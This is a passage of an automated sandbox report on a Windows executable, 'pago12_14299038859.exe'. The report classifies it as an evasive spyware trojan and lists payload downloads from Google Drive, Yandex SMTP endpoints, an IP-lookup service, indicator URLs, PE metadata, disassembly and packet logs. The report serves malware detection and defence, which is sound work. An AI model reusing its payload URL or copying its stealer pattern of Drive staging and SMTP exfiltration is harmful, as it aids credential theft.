            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%VirustotalBrowse
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://api.ipify.org%40%Avira URL Cloudsafe
            http://MXR45a7j4Fjsxd.orgt-0%Avira URL Cloudsafe
            http://yandex.ocsp-responder.com030%Avira URL Cloudsafe
            http://subca.ocsp-certum.com0.0%Avira URL Cloudsafe
            http://MXR45a7j4Fjsxd.org0%Avira URL Cloudsafe
            http://uYFyNj.com0%Avira URL Cloudsafe
            http://repository.cer0%Avira URL Cloudsafe
            http://subca.ocsp-certum.com010%Avira URL Cloudsafe
            https://api.ipify.org%GETMozilla/5.00%Avira URL Cloudsafe
            https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            smtp.yandex.ru
            77.88.21.158
            truefalse
              high
              drive.google.com
              172.217.16.142
              truefalse
                high
                googlehosted.l.googleusercontent.com
                172.217.18.97
                truefalse
                  high
                  doc-08-0o-docs.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    smtp.yandex.com
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hned2vkl7hruln90p34il302vgb/1639487400000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=downloadfalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://doc-08-0o-docs.googleusercontent.com/aCasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpfalse
                          high
                          http://DynDns.comDynDNSCasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://repository.certum.pl/ctnca.cer09CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haCasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            http://crl.certum.pl/ctnca.crl0kCasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                              high
                              https://drive.google.com/g(CasPol.exe, 0000000B.00000002.17067847597.0000000001697000.00000004.00000020.sdmpfalse
                                high
                                https://doc-08-0o-docs.googleusercontent.com/CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068150590.00000000016C8000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpfalse
                                  high
                                  https://doc-08-0o-docs.googleusercontent.com/tographyCasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpfalse
                                    high
                                    http://yandex.crl.certum.pl/ycasha2.crl0qCasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                      high
                                      https://api.ipify.org%4CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 0000000B.00000002.17078787168.000000001E3B3000.00000004.00000001.sdmpfalse
                                        high
                                        http://MXR45a7j4Fjsxd.orgt-CasPol.exe, 0000000B.00000002.17079278273.000000001E414000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://www.certum.pl/CPS0CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                          high
                                          http://smtp.yandex.comCasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmpfalse
                                            high
                                            http://yandex.ocsp-responder.com03CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://subca.ocsp-certum.com0.CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://repository.certum.pl/ca.cer09CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                              high
                                              http://MXR45a7j4Fjsxd.orgCasPol.exe, 0000000B.00000002.17079278273.000000001E414000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080004153.000000001E4A8000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://uYFyNj.comCasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://crls.yandex.net/certum/ycasha2.crl0-CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                                high
                                                http://repository.cerCasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://drive.google.com/CasPol.exe, 0000000B.00000002.17067847597.0000000001697000.00000004.00000020.sdmpfalse
                                                  high
                                                  http://subca.ocsp-certum.com01CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://api.ipify.org%GETMozilla/5.0CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://crl.certum.pl/ca.crl0hCasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.certum.pl/CPS0CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hneCasPol.exe, 0000000B.00000003.12729812870.00000000016E6000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068150590.00000000016C8000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://repository.certum.pl/ycasha2.cer0CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://csp.withgoogle.com/csp/report-to/gse_l9ocaqCasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          77.88.21.158
                                                          smtp.yandex.ruRussian Federation
                                                          13238YANDEXRUfalse
                                                          172.217.18.97
                                                          googlehosted.l.googleusercontent.comUnited States
                                                          15169GOOGLEUSfalse
                                                          172.217.16.142
                                                          drive.google.comUnited States
                                                          15169GOOGLEUSfalse

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:539535
                                                          Start date:14.12.2021
                                                          Start time:14:07:53
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 2s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:pago12_14299038859.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                          Run name:Suspected Instruction Hammering
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@4/2@3/3
                                                          EGA Information:Failed
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 95%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded IPs from analysis (whitelisted): 20.82.19.171
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, nexusrules.officeapps.live.com, wd-prod-cp.trafficmanager.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          14:11:07API Interceptor2453x Sleep call for process: CasPol.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\~DFBA7BE0F4B3918979.TMP
                                                          Process:C:\Users\user\Desktop\pago12_14299038859.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.9730200708513237
                                                          Encrypted:false
                                                          SSDEEP:24:r/hDKifA3RuOH/3+aVR4J5lBefVYyDnKoKgQBX2:rJKifAhx5853weyDKoKgQB
                                                          MD5:E8C98D07896778A7A68D9895386FC8A0
                                                          SHA1:734F506C412CAFA5BF6680E7C1EBBE939CE63773
                                                          SHA-256:DCEDB0D3B75126360C0556DC3310ACBBB97ADAD114F518DF8C65E84C0E6BED51
                                                          SHA-512:A48737384CACB83CDB77F1CD5CCD89EB50E5CB48C7F6A41E2EC91093A4B4E6A634B0CCF85C39B4DC49D6C0B4D3D2DEF69FF002FCD96D0CC9EA8AFADF47E6F14F
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          \Device\ConDrv
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):30
                                                          Entropy (8bit):3.964735178725505
                                                          Encrypted:false
                                                          SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                          MD5:9F754B47B351EF0FC32527B541420595
                                                          SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                          SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                          SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview: NordVPN directory not found!..

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.9046699069840765
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:pago12_14299038859.exe
                                                          File size:167936
                                                          MD5:9a1518ed709f916360e56b5ac7d76995
                                                          SHA1:7c85312d66edf5b02ebd6c25cfe9c036a3471263
                                                          SHA256:2a0878c196278384aab473c92977d236680c788b4e5ae0cc1f415a075a6fa9e2
                                                          SHA512:8f99b5b19d72548340c8bfc3ce6460d73c055b556daa956739cdeb67c2d0db56688e9f017deb2a94f29a298da959d479f3c8dc20123eac6762c69103cd004b13
                                                          SSDEEP:1536:FrdvP8OOzT80mFxgs0HtyWPK0xljCwioDoWjJNa+I37KTqPRzV5pkNXuUAnq:ddvP81zTGUjKWMoDhjJNS7hPHUAnq
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\.......%.......Rich............................PE..L.....pV.................`...P......\........p....@

                                                          File Icon

                                                          Icon Hash:937160c0d2e4f9fb

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x40195c
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                          DLL Characteristics:
                                                          Time Stamp:0x567083E4 [Tue Dec 15 21:19:32 2015 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:e7597de960f525af7c9e8aa5873fcec3

                                                          Entrypoint Preview

                                                          Instruction
                                                          push 00402000h
                                                          call 00007F3D1861D0F5h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          xor byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          cmp byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          or al, 53h
                                                          into
                                                          push ebp
                                                          sub ah, ch
                                                          push ds
                                                          inc esp
                                                          xchg eax, esi
                                                          mov al, byte ptr [E7FEEB99h]
                                                          arpl word ptr [ebx+00000000h], bx
                                                          add byte ptr [eax], al
                                                          add dword ptr [eax], eax
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          push ebx
                                                          inc ebp
                                                          dec ebp
                                                          dec ecx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          dec esp
                                                          xor dword ptr [eax], eax
                                                          or byte ptr [eax-73h], dh
                                                          insb
                                                          xchg eax, ebx
                                                          rcpps xmm3, dqword ptr [CBA58348h]
                                                          sub eax, 9CA7CE77h
                                                          mov ebp, C69ABAB7h
                                                          mov esp, dword ptr [ebp+4Ch]
                                                          mov byte ptr [CC5C4C4Dh], al
                                                          or al, byte ptr [esi+69h]
                                                          cmp cl, byte ptr [edi-53h]
                                                          xor ebx, dword ptr [ecx-48EE309Ah]
                                                          or al, 00h
                                                          stosb
                                                          add byte ptr [eax-2Dh], ah
                                                          xchg eax, ebx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          stc
                                                          add eax, 04C50000h
                                                          add byte ptr [eax], al
                                                          add byte ptr [esi], al
                                                          add byte ptr [ebp+4Eh], dl
                                                          inc esp
                                                          inc ebp
                                                          push edx
                                                          dec eax
                                                          add byte ptr [53000401h], cl
                                                          je 00007F3D1861D167h
                                                          je 00007F3D1861D102h
                                                          sbb dword ptr [ecx], eax
                                                          add byte ptr [edx+00h], al
                                                          and eax, dword ptr [esi+6C000004h]

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x264140x28.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2b0000x850.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x24c.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x25ba00x26000False0.558850740132data7.15645216813IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .data0x270000x36e40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x2b0000x8500x1000False0.322265625data3.08403187378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x2b3e80x468GLS_BINARY_LSB_FIRST
                                                          RT_GROUP_ICON0x2b3d40x14data
                                                          RT_VERSION0x2b0f00x2e4dataEnglishUnited States

                                                          Imports

                                                          DLLImport
                                                          MSVBVM60.DLL__vbaVarSub, __vbaR8FixI4, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaHresultCheck, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, __vbaObjVar, __vbaStrR4, _adj_fpatan, __vbaRedim, __vbaStrR8, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaInStr, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaFpI4, __vbaVarTstGe, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, __vbaFPInt, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0409 0x04b0
                                                          LegalCopyrightTemplafy
                                                          InternalNameFort
                                                          FileVersion2.00
                                                          CompanyNameTemplafy
                                                          LegalTrademarksTemplafy
                                                          CommentsTemplafy
                                                          ProductNameTemplafy
                                                          ProductVersion2.00
                                                          FileDescriptionTemplafy
                                                          OriginalFilenameFort.exe

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 14, 2021 14:10:56.267385006 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.267407894 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.267545938 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.282669067 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.282682896 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.315634012 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.315778017 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.315783978 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.315824986 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.316364050 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.316565037 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.453610897 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.454401016 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.454644918 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.465992928 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.507980108 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.767385960 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.767595053 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.767651081 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.767857075 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.767903090 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.768007040 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.768066883 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.768126011 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.773145914 CET49797443192.168.11.20172.217.16.142
                                                          Dec 14, 2021 14:10:56.773233891 CET44349797172.217.16.142192.168.11.20
                                                          Dec 14, 2021 14:10:56.871449947 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:56.871524096 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:56.871774912 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:56.872241020 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:56.872292042 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:56.925860882 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:56.926064968 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:56.929068089 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:56.929414034 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:56.933300018 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:56.933326006 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:56.933742046 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:56.933912039 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:56.934218884 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:56.975897074 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.607120991 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.607398987 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.608346939 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.608511925 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.608524084 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.608535051 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.609021902 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.609338999 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.609361887 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.610480070 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.610645056 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.610656977 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.610661030 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.610670090 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.610868931 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.611144066 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.611283064 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.611331940 CET44349798172.217.18.97192.168.11.20
                                                          Dec 14, 2021 14:10:57.611536026 CET49798443192.168.11.20172.217.18.97
                                                          Dec 14, 2021 14:10:57.617722034 CET44349798172.217.18.97192.168.11.20
